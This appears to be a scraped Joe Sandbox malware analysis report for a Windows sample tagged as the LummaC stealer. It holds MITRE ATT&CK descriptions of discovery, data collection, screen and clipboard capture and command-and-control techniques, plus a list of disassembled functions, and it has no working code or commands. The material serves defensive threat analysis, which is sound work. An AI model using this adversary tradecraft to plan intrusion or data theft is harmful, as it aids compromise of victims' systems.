Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UhsjR3ZFTD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
UhsjR3ZFTD.exe

Function 006F019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 006C1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 006C20B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54
libraryloadersynchronizationCOMMON

Function 006D62B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 006D6A9A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 006C1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 006CF2F3 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 006DD014 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 006D6F18 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 006DD7ED Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 006D6E02 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 006D6163 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 006C2010 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Function 006D5327 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre